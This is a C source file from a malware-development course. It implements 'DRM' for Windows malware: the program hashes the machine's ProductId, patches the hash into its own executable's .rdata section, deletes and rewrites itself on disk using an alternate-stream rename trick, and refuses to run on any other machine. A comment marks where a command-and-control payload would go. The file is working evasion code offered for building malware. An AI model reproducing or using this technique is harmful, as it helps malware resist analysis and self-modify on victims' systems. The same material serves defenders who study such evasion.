// @NUL0x4C | @mrd0x : MalDevAcademy

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

#pragma warning(disable: 4703)


#define DEFAULT_HASH				0xAABBEEFF
#define	SUB_KEY						L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
#define	KEY_VALUE					L"ProductId"
#define NEW_STREAM					L":%x%x\x00"

#define REPORT_ERROR(szApiName, _GOTO)											\
	printf("[!] \"%ws\" Failed With Error: %d \n", szApiName, GetLastError());	\
	goto _GOTO;

//----------------------------------------------------------------------------------------------------------------------------------------------------------

typedef struct _FILE_RENAME_INFO2 {
#if (_WIN32_WINNT >= _WIN32_WINNT_WIN10_RS1)
	union {
		BOOLEAN ReplaceIfExists;  
		DWORD Flags;              
	} DUMMYUNIONNAME;
#else
	BOOLEAN ReplaceIfExists;
#endif
	HANDLE RootDirectory;
	DWORD FileNameLength;
	WCHAR FileName[MAX_PATH]; // Instead of "WCHAR FileName[0]" (See FILE_RENAME_INFO's original documentation)
} FILE_RENAME_INFO2, * PFILE_RENAME_INFO2;

//----------------------------------------------------------------------------------------------------------------------------------------------------------

// The machine hash
CONST DWORD g_MachineID = DEFAULT_HASH;

//----------------------------------------------------------------------------------------------------------------------------------------------------------

//https://github.com/vxunderground/VX-API/blob/main/VX-API/HashStringDjb2.cpp
DWORD HashStringDjb2W(IN LPCWSTR String){

	ULONG Hash = 5381;
	INT c = 0;

	while (c = *String++)
		Hash = ((Hash << 5) + Hash) + c;

	return Hash;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------

// Read the 'ProductId' key from 'Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
// Output is saved into the parameters
BOOL ReadProductIDFromReg(OUT PVOID* ppAddressToReadTo, OUT PDWORD pdwBytesRead) {

	PVOID		pBuffer					= NULL;
	DWORD		dwBytesRead				= 0x00;
	LSTATUS     STATUS					= 0x00;

	if (!ppAddressToReadTo || !pdwBytesRead)
		return FALSE;

	if ((STATUS = RegGetValueW(HKEY_LOCAL_MACHINE, SUB_KEY, KEY_VALUE, RRF_RT_ANY, NULL, NULL, &dwBytesRead)) != ERROR_SUCCESS) {
		printf("[!] RegGetValueW [1] Failed With Error : %d\n", STATUS);
		goto _FUNC_CLEANUP;
	}

	pBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwBytesRead);
	if (!pBuffer) {
		REPORT_ERROR(TEXT("HeapAlloc"), _FUNC_CLEANUP);
	}

	if ((STATUS = RegGetValueW(HKEY_LOCAL_MACHINE, SUB_KEY, KEY_VALUE, RRF_RT_ANY, NULL, pBuffer, &dwBytesRead)) != ERROR_SUCCESS) {
		printf("[!] RegGetValueW [2] Failed With Error : %d\n", STATUS);
		goto _FUNC_CLEANUP;
	}

	*pdwBytesRead			= dwBytesRead;
	*ppAddressToReadTo		= pBuffer;

_FUNC_CLEANUP:
	if (pBuffer && !*ppAddressToReadTo)
		HeapFree(GetProcessHeap(), 0x00, pBuffer);
	return *ppAddressToReadTo == NULL ? FALSE : TRUE;
}


//----------------------------------------------------------------------------------------------------------------------------------------------------------

// Read the 'szLocalImageName' image from disk
// Output is saved into the parameters
BOOL ReadSelfFromDisk(IN LPWSTR szLocalImageName, OUT ULONG_PTR* pModule, OUT DWORD* pdwFileSize) {

	HANDLE		hFile				= INVALID_HANDLE_VALUE;
	PBYTE		pFileBuffer			= NULL;
	DWORD		dwFileSize			= 0x00,
				dwNumberOfBytesRead = 0x00;
	
	if (!szLocalImageName || !pModule || !pdwFileSize)
		return FALSE;

	if ((hFile = CreateFileW(szLocalImageName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE) {
		REPORT_ERROR(TEXT("CreateFileW"), _FUNC_CLEANUP)
	}

	if ((dwFileSize = GetFileSize(hFile, NULL)) == INVALID_FILE_SIZE) {
		REPORT_ERROR(TEXT("GetFileSize"), _FUNC_CLEANUP)
	}

	if ((pFileBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize)) == NULL) {
		REPORT_ERROR(TEXT("HeapAlloc"), _FUNC_CLEANUP)
	}

	if (!ReadFile(hFile, pFileBuffer, dwFileSize, &dwNumberOfBytesRead, NULL) || dwFileSize != dwNumberOfBytesRead) {
		REPORT_ERROR(TEXT("ReadFile"), _FUNC_CLEANUP)
	}

	*pModule		 = (ULONG_PTR)pFileBuffer;
	*pdwFileSize	 = dwFileSize;

_FUNC_CLEANUP:
	if (hFile != INVALID_HANDLE_VALUE)
		CloseHandle(hFile);
	if (!*pModule && pFileBuffer)
		HeapFree(GetProcessHeap(), 0, pFileBuffer);
	return *pModule == NULL ? FALSE : TRUE;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------

// Delete 'szFileName' from disk
BOOL DeleteSelfFromDisk(IN LPCWSTR szFileName) {

	BOOL						bResult			= FALSE;
	HANDLE                      hFile			= INVALID_HANDLE_VALUE;
	FILE_DISPOSITION_INFO       DisposalInfo	= { .DeleteFile = TRUE };
	FILE_RENAME_INFO2			RenameInfo		= { .FileNameLength = sizeof(NEW_STREAM), .ReplaceIfExists = FALSE, .RootDirectory = 0x00 };

	if (!szFileName)
		return FALSE;

	swprintf(RenameInfo.FileName, MAX_PATH, NEW_STREAM, rand(), rand() * rand());

	hFile = CreateFileW(szFileName, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
	if (hFile == INVALID_HANDLE_VALUE) {
		REPORT_ERROR(TEXT("CreateFileW [R]"), _FUNC_CLEANUP)
	}
	
	if (!SetFileInformationByHandle(hFile, FileRenameInfo, &RenameInfo, sizeof(RenameInfo))) {
		REPORT_ERROR(TEXT("SetFileInformationByHandle [R]"), _FUNC_CLEANUP)
	}
	
	CloseHandle(hFile);

	hFile = CreateFileW(szFileName, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
	if (hFile == INVALID_HANDLE_VALUE) {
		REPORT_ERROR(TEXT("CreateFileW [D]"), _FUNC_CLEANUP)
	}

	if (!SetFileInformationByHandle(hFile, FileDispositionInfo, &DisposalInfo, sizeof(DisposalInfo))) {
		REPORT_ERROR(TEXT("SetFileInformationByHandle [D]"), _FUNC_CLEANUP)
	}

	bResult = TRUE;

_FUNC_CLEANUP:
	if (hFile != INVALID_HANDLE_VALUE)
		CloseHandle(hFile);
	return bResult;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------

// Write 'szLocalImageName' to disk
BOOL WriteSelfToDisk(IN LPWSTR szLocalImageName, IN PVOID pImageBase, IN DWORD sImageSize) {

	HANDLE		hFile						= INVALID_HANDLE_VALUE;
	DWORD		dwNumberOfBytesWritten		= 0x00;

	if (!szLocalImageName || !pImageBase || !sImageSize)
		return FALSE;

	if ((hFile = CreateFileW(szLocalImageName, GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE) {
		REPORT_ERROR(TEXT("CreateFileW"), _FUNC_CLEANUP)
	}

	if (!WriteFile(hFile, pImageBase, sImageSize, &dwNumberOfBytesWritten, NULL) || sImageSize != dwNumberOfBytesWritten) {
		REPORT_ERROR(TEXT("WriteFile"), _FUNC_CLEANUP)
	}

_FUNC_CLEANUP:
	if (hFile != INVALID_HANDLE_VALUE)
		CloseHandle(hFile);
	return dwNumberOfBytesWritten == sImageSize ? TRUE : FALSE;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------

// Create a hash for the current machine and save it using the 'g_MachineID' global variable 
BOOL InitializeDrmMalware() {

	// The function should not be called when g_MachineID's value is different that the default hash value
	if (g_MachineID != DEFAULT_HASH)
		return TRUE;

	BOOL					bResult					= FALSE;
	LPWSTR					szLocalImage			= NULL;
	ULONG_PTR				uModule					= NULL;
	DWORD					dwFileSize				= 0x00;

	PIMAGE_NT_HEADERS		pImgNtHdrs				= NULL;
	PIMAGE_SECTION_HEADER	pImgSec					= NULL;

	DWORD					dwOffsetOfMachineBuf	= 0x00;
	PDWORD					pRdataSection			= NULL;

	LPWSTR					szProductId				= NULL;
	DWORD					dwNumberOfBytesRead		= 0x00;

	// Read local image
	szLocalImage = (LPWSTR)(((PPEB)__readgsqword(0x60))->ProcessParameters->ImagePathName.Buffer);
	if (!ReadSelfFromDisk(szLocalImage, &uModule, &dwFileSize))
		goto _FUNC_CLEANUP;

	// Get the Nt headers
	pImgNtHdrs = uModule + ((PIMAGE_DOS_HEADER)uModule)->e_lfanew;
	if (pImgNtHdrs->Signature != IMAGE_NT_SIGNATURE)
		goto _FUNC_CLEANUP;

	// Get the Section header
	pImgSec = IMAGE_FIRST_SECTION(pImgNtHdrs);

	for (DWORD i = 0; i < pImgNtHdrs->FileHeader.NumberOfSections; i++, pImgSec++){

		// 'g_MachineID' is a read only variable (constant)
		if (strcmp(".rdata", pImgSec->Name) == 0) {

			// Calculate the start of the .rdata section
			pRdataSection		= (PDWORD)(uModule + pImgSec->PointerToRawData);
			
			for (SIZE_T x = 0; x < pImgSec->SizeOfRawData; x += sizeof(DWORD)){

				// Search each DWORD in .rdata
				if (*(DWORD*)(pRdataSection + x) == g_MachineID) {
					
					// When found, save index
					// At this point g_MachineID is equal to 'DEFAULT_HASH'
					dwOffsetOfMachineBuf = x;
					break;
				}
			}
		}
	}

	// If 'g_MachineID' is found in the image read
	if (dwOffsetOfMachineBuf != 0x00) {
		
		// Read the product ID of the machine
		if (!ReadProductIDFromReg(&szProductId, &dwNumberOfBytesRead))
			goto _FUNC_CLEANUP;
	
		// Calculate the hash of the product ID and save it inside 'g_MachineID' of the read image
		*(DWORD*)(pRdataSection + dwOffsetOfMachineBuf) = HashStringDjb2W(szProductId);

		// Delete the image where 'g_MachineID' is DEFAULT_HASH 
		if (!DeleteSelfFromDisk(szLocalImage))
			goto _FUNC_CLEANUP;

		// Write the image with the new 'g_MachineID' value (Hash value of our product ID)
		if (!WriteSelfToDisk(szLocalImage, uModule, dwFileSize))
			goto _FUNC_CLEANUP;

		bResult = TRUE;
	}


_FUNC_CLEANUP:
	if (uModule != NULL)
		HeapFree(GetProcessHeap(), 0x00, uModule);
	if (szProductId != NULL)
		HeapFree(GetProcessHeap(), 0x00, szProductId);
	return bResult;
}

//----------------------------------------------------------------------------------------------------------------------------------------------------------


BOOL CompareMachineHash() {
	
	BOOL		bResult					= FALSE;
	LPWSTR		szProductId				= NULL;
	DWORD		dwNumberOfBytesRead		= 0x00;

	// The function should not be called when g_MachineID is equal to the default hash value
	if (g_MachineID == DEFAULT_HASH)
		return TRUE;

	// Read the product ID of the machine
	if (!ReadProductIDFromReg(&szProductId, &dwNumberOfBytesRead))
		goto _FUNC_CLEANUP;

	// Calculate the hash of the product ID, and compare it to the current hash
	if (HashStringDjb2W(szProductId) != g_MachineID)
		goto _FUNC_CLEANUP;

	bResult = TRUE;

_FUNC_CLEANUP:
	if (szProductId != NULL)
		HeapFree(GetProcessHeap(), 0x00, szProductId);
	return bResult;
}


//----------------------------------------------------------------------------------------------------------------------------------------------------------



int main() {

	printf("[i] Saved Machine ID: 0x%0.8X\n", g_MachineID);

	// Hash is equal to the default value (program is not yet executed)
	if (g_MachineID == DEFAULT_HASH) {
		printf("[i] First Time Running, Intializing DRM Protection ... ");
		// Update the image to contain the unique system hash
		if (!InitializeDrmMalware())
			return -1;
		printf("[+] Done \n");
	}
	// The hash does not equal the default hash value
	else {
		printf("[i] Image Was Executed Before, Comparing Local Machine ID ... ");
		// Check if the image is on the same system or not
		if (CompareMachineHash())
			printf("[+] Same Machine ID \n");
		else {
			printf("[!] Different Machine ID \n");
			return -1;
		}
	}


	//
	//
	// Malware Code - Ex: Executing A C&C Payload
	//
	//

	return 0;
}


